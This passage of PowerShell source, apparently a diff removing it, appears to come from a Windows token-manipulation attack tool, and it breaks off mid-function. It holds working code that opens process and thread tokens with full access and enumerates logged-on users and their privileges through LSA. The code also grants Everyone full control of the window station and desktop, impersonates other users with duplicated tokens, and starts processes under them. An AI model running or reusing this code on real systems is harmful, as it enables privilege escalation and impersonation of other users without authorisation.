- - $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID) - $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize) - $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) - - $Result = $LookupPrivilegeValue.Invoke($null, $Privilege, [Ref] $LuidObject) - - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) - $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize) - $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr) - - $LuidAndAttributes.Luid = $LuidObject - $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED - - [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES) - $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) - $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) - $TokenPrivileges.PrivilegeCount = 1 - $TokenPrivileges.Privileges = $LuidAndAttributes - - $Global:TokenPriv = $TokenPrivileges - - Write-Verbose "Attempting to enable privilege: $Privilege" - $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) - if ($Result -eq $false) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - $CloseHandle.Invoke($ThreadToken) | Out-Null - Write-Verbose "Enabled privilege: $Privilege" - } - - - #Change the ACL of the WindowStation and Desktop - function Set-DesktopACLs - { - Enable-Privilege -Privilege SeSecurityPrivilege - - #Change the privilege for the current window station to allow full privilege for all users - $WindowStationStr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("WinSta0") - $hWinsta = $OpenWindowStationW.Invoke($WindowStationStr, $false, $Win32Constants.ACCESS_SYSTEM_SECURITY -bor $Win32Constants.READ_CONTROL -bor $Win32Constants.WRITE_DAC) - - if ($hWinsta -eq [IntPtr]::Zero) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - Set-DesktopACLToAllowEveryone -hObject $hWinsta - $CloseHandle.Invoke($hWinsta) | Out-Null - - #Change the privilege for the current desktop to allow full privilege for all users - $hDesktop = $OpenDesktopA.Invoke("default", 0, $false, $Win32Constants.DESKTOP_GENERIC_ALL -bor $Win32Constants.WRITE_DAC) - if ($hDesktop -eq [IntPtr]::Zero) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - Set-DesktopACLToAllowEveryone -hObject $hDesktop - $CloseHandle.Invoke($hDesktop) | Out-Null - } - - - function Set-DesktopACLToAllowEveryone - { - Param( - [IntPtr]$hObject - ) - - [IntPtr]$ppSidOwner = [IntPtr]::Zero - [IntPtr]$ppsidGroup = [IntPtr]::Zero - [IntPtr]$ppDacl = [IntPtr]::Zero - [IntPtr]$ppSacl = [IntPtr]::Zero - [IntPtr]$ppSecurityDescriptor = [IntPtr]::Zero - #0x7 is window station, change for other types - $retVal = $GetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, [Ref]$ppSidOwner, [Ref]$ppSidGroup, [Ref]$ppDacl, [Ref]$ppSacl, [Ref]$ppSecurityDescriptor) - if ($retVal -ne 0) - { - Write-Error "Unable to call GetSecurityInfo. ErrorCode: $retVal" - } - - if ($ppDacl -ne [IntPtr]::Zero) - { - $AclObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ppDacl, [Type]$ACL) - - #Add all users to acl - [UInt32]$RealSize = 2000 - $pAllUsersSid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($RealSize) - $Success = $CreateWellKnownSid.Invoke(1, [IntPtr]::Zero, $pAllUsersSid, [Ref]$RealSize) - if (-not $Success) - { - Throw (New-Object ComponentModel.Win32Exception) - } - - #For user "Everyone" - $TrusteeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TRUSTEE) - $TrusteePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TrusteeSize) - $TrusteeObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TrusteePtr, [Type]$TRUSTEE) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TrusteePtr) - $TrusteeObj.pMultipleTrustee = [IntPtr]::Zero - $TrusteeObj.MultipleTrusteeOperation = 0 - $TrusteeObj.TrusteeForm = $Win32Constants.TRUSTEE_IS_SID - $TrusteeObj.TrusteeType = $Win32Constants.TRUSTEE_IS_WELL_KNOWN_GROUP - $TrusteeObj.ptstrName = $pAllUsersSid - - #Give full permission - $ExplicitAccessSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$EXPLICIT_ACCESS) - $ExplicitAccessPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ExplicitAccessSize) - $ExplicitAccess = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExplicitAccessPtr, [Type]$EXPLICIT_ACCESS) - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ExplicitAccessPtr) - $ExplicitAccess.grfAccessPermissions = 0xf03ff - $ExplicitAccess.grfAccessMode = $Win32constants.GRANT_ACCESS - $ExplicitAccess.grfInheritance = $Win32Constants.OBJECT_INHERIT_ACE - $ExplicitAccess.Trustee = $TrusteeObj - - [IntPtr]$NewDacl = [IntPtr]::Zero - - $RetVal = $SetEntriesInAclW.Invoke(1, [Ref]$ExplicitAccess, $ppDacl, [Ref]$NewDacl) - if ($RetVal -ne 0) - { - Write-Error "Error calling SetEntriesInAclW: $RetVal" - } - - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAllUsersSid) - - if ($NewDacl -eq [IntPtr]::Zero) - { - throw "New DACL is null" - } - - #0x7 is window station, change for other types - $RetVal = $SetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, $ppSidOwner, $ppSidGroup, $NewDacl, $ppSacl) - if ($RetVal -ne 0) - { - Write-Error "SetSecurityInfo failed. Return value: $RetVal" - } - - $LocalFree.Invoke($ppSecurityDescriptor) | Out-Null - } - } - - - #Get the primary token for the specified processId - function Get-PrimaryToken - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [UInt32] - $ProcessId, - - #Open the token with all privileges. Requires SYSTEM because some of the privileges are restricted to SYSTEM. - [Parameter()] - [Switch] - $FullPrivs - ) - - if ($FullPrivs) - { - $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS - } - else - { - $TokenPrivs = $Win32Constants.TOKEN_ASSIGN_PRIMARY -bor $Win32Constants.TOKEN_DUPLICATE -bor $Win32Constants.TOKEN_IMPERSONATE -bor $Win32Constants.TOKEN_QUERY - } - - $ReturnStruct = New-Object PSObject - - $hProcess = $OpenProcess.Invoke($Win32Constants.PROCESS_QUERY_INFORMATION, $true, [UInt32]$ProcessId) - $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcess -Value $hProcess - if ($hProcess -eq [IntPtr]::Zero) - { - #If a process is a protected process it cannot be enumerated. This call should only fail for protected processes. - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Verbose "Failed to open process handle for ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error code: $ErrorCode . This is likely because this is a protected process." - return $null - } - else - { - [IntPtr]$hProcToken = [IntPtr]::Zero - $Success = $OpenProcessToken.Invoke($hProcess, $TokenPrivs, [Ref]$hProcToken) - - #Close the handle to hProcess (the process handle) - if (-not $CloseHandle.Invoke($hProcess)) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "Failed to close process handle, this is unexpected. ErrorCode: $ErrorCode" - } - $hProcess = [IntPtr]::Zero - - if ($Success -eq $false -or $hProcToken -eq [IntPtr]::Zero) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "Failed to get processes primary token. ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error: $ErrorCode" - return $null - } - else - { - $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcToken -Value $hProcToken - } - } - - return $ReturnStruct - } - - - function Get-ThreadToken - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [UInt32] - $ThreadId - ) - - $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS - - $RetStruct = New-Object PSObject - [IntPtr]$hThreadToken = [IntPtr]::Zero - - $hThread = $OpenThread.Invoke($Win32Constants.THREAD_ALL_ACCESS, $false, $ThreadId) - if ($hThread -eq [IntPtr]::Zero) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - if ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER) #The thread probably no longer exists - { - Write-Warning "Failed to open thread handle for ThreadId: $ThreadId. Error code: $ErrorCode" - } - } - else - { - $Success = $OpenThreadToken.Invoke($hThread, $TokenPrivs, $false, [Ref]$hThreadToken) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - if (($ErrorCode -ne $Win32Constants.ERROR_NO_TOKEN) -and #This error is returned when the thread isn't impersonated - ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER)) #Probably means the thread was closed - { - Write-Warning "Failed to call OpenThreadToken for ThreadId: $ThreadId. Error code: $ErrorCode" - } - } - else - { - Write-Verbose "Successfully queried thread token" - } - - #Close the handle to hThread (the thread handle) - if (-not $CloseHandle.Invoke($hThread)) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "Failed to close thread handle, this is unexpected. ErrorCode: $ErrorCode" - } - $hThread = [IntPtr]::Zero - } - - $RetStruct | Add-Member -MemberType NoteProperty -Name hThreadToken -Value $hThreadToken - return $RetStruct - } - - - #Gets important information about the token such as the logon type associated with the logon - function Get-TokenInformation - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [IntPtr] - $hToken - ) - - $ReturnObj = $null - - $TokenStatsSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_STATISTICS) - [IntPtr]$TokenStatsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenStatsSize) - [UInt32]$RealSize = 0 - $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenStatistics, $TokenStatsPtr, $TokenStatsSize, [Ref]$RealSize) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "GetTokenInformation failed. Error code: $ErrorCode" - } - else - { - $TokenStats = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenStatsPtr, [Type]$TOKEN_STATISTICS) - - #Query LSA to determine what the logontype of the session is that the token corrosponds to, as well as the username/domain of the logon - $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenStats.AuthenticationId, $LuidPtr, $false) - - [IntPtr]$LogonSessionDataPtr = [IntPtr]::Zero - $ReturnVal = $LsaGetLogonSessionData.Invoke($LuidPtr, [Ref]$LogonSessionDataPtr) - if ($ReturnVal -ne 0 -and $LogonSessionDataPtr -eq [IntPtr]::Zero) - { - Write-Warning "Call to LsaGetLogonSessionData failed. Error code: $ReturnVal. LogonSessionDataPtr = $LogonSessionDataPtr" - } - else - { - $LogonSessionData = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LogonSessionDataPtr, [Type]$SECURITY_LOGON_SESSION_DATA) - if ($LogonSessionData.Username.Buffer -ne [IntPtr]::Zero -and - $LogonSessionData.LoginDomain.Buffer -ne [IntPtr]::Zero) - { - #Get the username and domainname associated with the token - $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.Username.Buffer, $LogonSessionData.Username.Length/2) - $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.LoginDomain.Buffer, $LogonSessionData.LoginDomain.Length/2) - - #If UserName is for the computer account, figure out what account it actually is (SYSTEM, NETWORK SERVICE) - #Only do this for the computer account because other accounts return correctly. Also, doing this for a domain account - #results in querying the domain controller which is unwanted. - if ($Username -ieq "$($env:COMPUTERNAME)`$") - { - [UInt32]$Size = 100 - [UInt32]$NumUsernameChar = $Size / 2 - [UInt32]$NumDomainChar = $Size / 2 - [UInt32]$SidNameUse = 0 - $UsernameBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size) - $DomainBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size) - $Success = $LookupAccountSidW.Invoke([IntPtr]::Zero, $LogonSessionData.Sid, $UsernameBuffer, [Ref]$NumUsernameChar, $DomainBuffer, [Ref]$NumDomainChar, [Ref]$SidNameUse) - - if ($Success) - { - $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($UsernameBuffer) - $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($DomainBuffer) - } - else - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "Error calling LookupAccountSidW. Error code: $ErrorCode" - } - - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UsernameBuffer) - $UsernameBuffer = [IntPtr]::Zero - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($DomainBuffer) - $DomainBuffer = [IntPtr]::Zero - } - - $ReturnObj = New-Object PSObject - $ReturnObj | Add-Member -Type NoteProperty -Name Domain -Value $Domain - $ReturnObj | Add-Member -Type NoteProperty -Name Username -Value $Username - $ReturnObj | Add-Member -Type NoteProperty -Name hToken -Value $hToken - $ReturnObj | Add-Member -Type NoteProperty -Name LogonType -Value $LogonSessionData.LogonType - - - #Query additional info about the token such as if it is elevated - $ReturnObj | Add-Member -Type NoteProperty -Name IsElevated -Value $false - - $TokenElevationSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_ELEVATION) - $TokenElevationPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenElevationSize) - [UInt32]$RealSize = 0 - $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenElevation, $TokenElevationPtr, $TokenElevationSize, [Ref]$RealSize) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "GetTokenInformation failed to retrieve TokenElevation status. ErrorCode: $ErrorCode" - } - else - { - $TokenElevation = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenelevationPtr, [Type]$TOKEN_ELEVATION) - if ($TokenElevation.TokenIsElevated -ne 0) - { - $ReturnObj.IsElevated = $true - } - } - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenElevationPtr) - - - #Query the token type to determine if the token is a primary or impersonation token - $ReturnObj | Add-Member -Type NoteProperty -Name TokenType -Value "UnableToRetrieve" - - [UInt32]$TokenTypeSize = 4 - [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypeSize) - [UInt32]$RealSize = 0 - $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenType, $TokenTypePtr, $TokenTypeSize, [Ref]$RealSize) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode" - } - else - { - [UInt32]$TokenType = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenTypePtr, [Type][UInt32]) - switch($TokenType) - { - 1 {$ReturnObj.TokenType = "Primary"} - 2 {$ReturnObj.TokenType = "Impersonation"} - } - } - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr) - - - #Query the impersonation level if the token is an Impersonation token - if ($ReturnObj.TokenType -ieq "Impersonation") - { - $ReturnObj | Add-Member -Type NoteProperty -Name ImpersonationLevel -Value "UnableToRetrieve" - - [UInt32]$ImpersonationLevelSize = 4 - [IntPtr]$ImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ImpersonationLevelSize) #sizeof uint32 - [UInt32]$RealSize = 0 - $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenImpersonationLevel, $ImpersonationLevelPtr, $ImpersonationLevelSize, [Ref]$RealSize) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode" - } - else - { - [UInt32]$ImpersonationLevel = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImpersonationLevelPtr, [Type][UInt32]) - switch ($ImpersonationLevel) - { - 0 { $ReturnObj.ImpersonationLevel = "SecurityAnonymous" } - 1 { $ReturnObj.ImpersonationLevel = "SecurityIdentification" } - 2 { $ReturnObj.ImpersonationLevel = "SecurityImpersonation" } - 3 { $ReturnObj.ImpersonationLevel = "SecurityDelegation" } - } - } - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ImpersonationLevelPtr) - } - - - #Query the token sessionid - $ReturnObj | Add-Member -Type NoteProperty -Name SessionID -Value "Unknown" - - [UInt32]$TokenSessionIdSize = 4 - [IntPtr]$TokenSessionIdPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenSessionIdSize) - [UInt32]$RealSize = 0 - $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenSessionId, $TokenSessionIdPtr, $TokenSessionIdSize, [Ref]$RealSize) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode" - } - else - { - [UInt32]$TokenSessionId = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenSessionIdPtr, [Type][UInt32]) - $ReturnObj.SessionID = $TokenSessionId - } - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenSessionIdPtr) - - - #Query the token privileges - $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesEnabled -Value @() - $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesAvailable -Value @() - - [UInt32]$TokenPrivilegesSize = 1000 - [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesSize) - [UInt32]$RealSize = 0 - $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenPrivileges, $TokenPrivilegesPtr, $TokenPrivilegesSize, [Ref]$RealSize) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode" - } - else - { - $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) - - #Loop through each privilege - [IntPtr]$PrivilegesBasePtr = [IntPtr](Add-SignedIntAsUnsigned $TokenPrivilegesPtr ([System.Runtime.InteropServices.Marshal]::OffsetOf([Type]$TOKEN_PRIVILEGES, "Privileges"))) - $LuidAndAttributeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) - for ($i = 0; $i -lt $TokenPrivileges.PrivilegeCount; $i++) - { - $LuidAndAttributePtr = [IntPtr](Add-SignedIntAsUnsigned $PrivilegesBasePtr ($LuidAndAttributeSize * $i)) - - $LuidAndAttribute = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributePtr, [Type]$LUID_AND_ATTRIBUTES) - - #Lookup privilege name - [UInt32]$PrivilegeNameSize = 60 - $PrivilegeNamePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PrivilegeNameSize) - $PLuid = $LuidAndAttributePtr #The Luid structure is the first object in the LuidAndAttributes structure, so a ptr to LuidAndAttributes also points to Luid - - $Success = $LookupPrivilegeNameW.Invoke([IntPtr]::Zero, $PLuid, $PrivilegeNamePtr, [Ref]$PrivilegeNameSize) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "Call to LookupPrivilegeNameW failed. Error code: $ErrorCode. RealSize: $PrivilegeNameSize" - } - $PrivilegeName = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($PrivilegeNamePtr) - - #Get the privilege attributes - $PrivilegeStatus = "" - $Enabled = $false - - if ($LuidAndAttribute.Attributes -eq 0) - { - $Enabled = $false - } - if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) -eq $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) #enabled by default - { - $Enabled = $true - } - if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED) -eq $Win32Constants.SE_PRIVILEGE_ENABLED) #enabled - { - $Enabled = $true - } - if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_REMOVED) -eq $Win32Constants.SE_PRIVILEGE_REMOVED) #SE_PRIVILEGE_REMOVED. This should never exist. Write a warning if it is found so I can investigate why/how it was found. - { - Write-Warning "Unexpected behavior: Found a token with SE_PRIVILEGE_REMOVED. Please report this as a bug. " - } - - if ($Enabled) - { - $ReturnObj.PrivilegesEnabled += ,$PrivilegeName - } - else - { - $ReturnObj.PrivilegesAvailable += ,$PrivilegeName - } - - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($PrivilegeNamePtr) - } - } - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) - - } - else - { - Write-Verbose "Call to LsaGetLogonSessionData succeeded. This SHOULD be SYSTEM since there is no data. $($LogonSessionData.UserName.Length)" - } - - #Free LogonSessionData - $ntstatus = $LsaFreeReturnBuffer.Invoke($LogonSessionDataPtr) - $LogonSessionDataPtr = [IntPtr]::Zero - if ($ntstatus -ne 0) - { - Write-Warning "Call to LsaFreeReturnBuffer failed. Error code: $ntstatus" - } - } - - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) - $LuidPtr = [IntPtr]::Zero - } - - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenStatsPtr) - $TokenStatsPtr = [IntPtr]::Zero - - return $ReturnObj - } - - - #Takes an array of TokenObjects built by the script and returns the unique ones - function Get-UniqueTokens - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [Object[]] - $AllTokens - ) - - $TokenByUser = @{} - $TokenByEnabledPriv = @{} - $TokenByAvailablePriv = @{} - - #Filter tokens by user - foreach ($Token in $AllTokens) - { - $Key = $Token.Domain + "\" + $Token.Username - if (-not $TokenByUser.ContainsKey($Key)) - { - #Filter out network logons and junk Windows accounts. This filter eliminates accounts which won't have creds because - # they are network logons (type 3) or logons for which the creds don't matter like LOCOAL SERVICE, DWM, etc.. - if ($Token.LogonType -ne 3 -and - $Token.Username -inotmatch "^DWM-\d+$" -and - $Token.Username -inotmatch "^LOCAL\sSERVICE$") - { - $TokenByUser.Add($Key, $Token) - } - } - else - { - #If Tokens have equal elevation levels, compare their privileges. - if($Token.IsElevated -eq $TokenByUser[$Key].IsElevated) - { - if (($Token.PrivilegesEnabled.Count + $Token.PrivilegesAvailable.Count) -gt ($TokenByUser[$Key].PrivilegesEnabled.Count + $TokenByUser[$Key].PrivilegesAvailable.Count)) - { - $TokenByUser[$Key] = $Token - } - } - #If the new token is elevated and the current token isn't, use the new token - elseif (($Token.IsElevated -eq $true) -and ($TokenByUser[$Key].IsElevated -eq $false)) - { - $TokenByUser[$Key] = $Token - } - } - } - - #Filter tokens by privilege - foreach ($Token in $AllTokens) - { - $Fullname = "$($Token.Domain)\$($Token.Username)" - - #Filter currently enabled privileges - foreach ($Privilege in $Token.PrivilegesEnabled) - { - if ($TokenByEnabledPriv.ContainsKey($Privilege)) - { - if($TokenByEnabledPriv[$Privilege] -notcontains $Fullname) - { - $TokenByEnabledPriv[$Privilege] += ,$Fullname - } - } - else - { - $TokenByEnabledPriv.Add($Privilege, @($Fullname)) - } - } - - #Filter currently available (but not enable) privileges - foreach ($Privilege in $Token.PrivilegesAvailable) - { - if ($TokenByAvailablePriv.ContainsKey($Privilege)) - { - if($TokenByAvailablePriv[$Privilege] -notcontains $Fullname) - { - $TokenByAvailablePriv[$Privilege] += ,$Fullname - } - } - else - { - $TokenByAvailablePriv.Add($Privilege, @($Fullname)) - } - } - } - - $ReturnDict = @{ - TokenByUser = $TokenByUser - TokenByEnabledPriv = $TokenByEnabledPriv - TokenByAvailablePriv = $TokenByAvailablePriv - } - - return (New-Object PSObject -Property $ReturnDict) - } - - - function Invoke-ImpersonateUser - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [IntPtr] - $hToken - ) - - #Duplicate the token so it can be used to create a new process - [IntPtr]$NewHToken = [IntPtr]::Zero - $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) #todo does this need to be freed - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "DuplicateTokenEx failed. ErrorCode: $ErrorCode" - } - else - { - $Success = $ImpersonateLoggedOnUser.Invoke($NewHToken) - if (-not $Success) - { - $Errorcode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "Failed to ImpersonateLoggedOnUser. Error code: $Errorcode" - } - } - - $Success = $CloseHandle.Invoke($NewHToken) - $NewHToken = [IntPtr]::Zero - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode" - } - - return $Success - } - - - function Create-ProcessWithToken - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [IntPtr] - $hToken, - - [Parameter(Position=1, Mandatory=$true)] - [String] - $ProcessName, - - [Parameter(Position=2)] - [String] - $ProcessArgs, - - [Parameter(Position=3)] - [Switch] - $PassThru - ) - Write-Verbose "Entering Create-ProcessWithToken" - #Duplicate the token so it can be used to create a new process - [IntPtr]$NewHToken = [IntPtr]::Zero - $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) - if (-not $Success) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - Write-Warning "DuplicateTokenEx failed. ErrorCode: $ErrorCode" - } - else - { - $StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO) - [IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize) - $memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null - [System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) #The first parameter (cb) is a DWORD which is the size of the struct - - $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION) - [IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize) - - $ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("$ProcessName") - $ProcessArgsPtr = [IntPtr]::Zero - if (-not [String]::IsNullOrEmpty($ProcessArgs)) - { - $ProcessArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("`"$ProcessName`" $ProcessArgs") - } - - $FunctionName = "" - if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0) - { - #Cannot use CreateProcessWithTokenW when in Session0 because CreateProcessWithTokenW throws an ACCESS_DENIED error. I believe it is because - #this API attempts to modify the desktop ACL. I would just use this API all the time, but it requires that I enable SeAssignPrimaryTokenPrivilege - #which is not ideal. - Write-Verbose "Running in Session 0. Enabling SeAssignPrimaryTokenPrivilege and calling CreateProcessAsUserW to create a process with alternate token." - Enable-Privilege -Privilege SeAssignPrimaryTokenPrivilege - $Success = $CreateProcessAsUserW.Invoke($NewHToken, $ProcessNamePtr, $ProcessArgsPtr, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr) - $FunctionName = "CreateProcessAsUserW" - } - else - { - Write-Verbose "Not running in Session 0, calling CreateProcessWithTokenW to create a process with alternate token." - $Success = $CreateProcessWithTokenW.Invoke($NewHToken, 0x0, $ProcessNamePtr, $ProcessArgsPtr, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr) - $FunctionName = "CreateProcessWithTokenW" - } - if ($Success) - { - #Free the handles returned in the ProcessInfo structure - $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION) - $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null - $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null - - #Pass created System.Diagnostics.Process object to 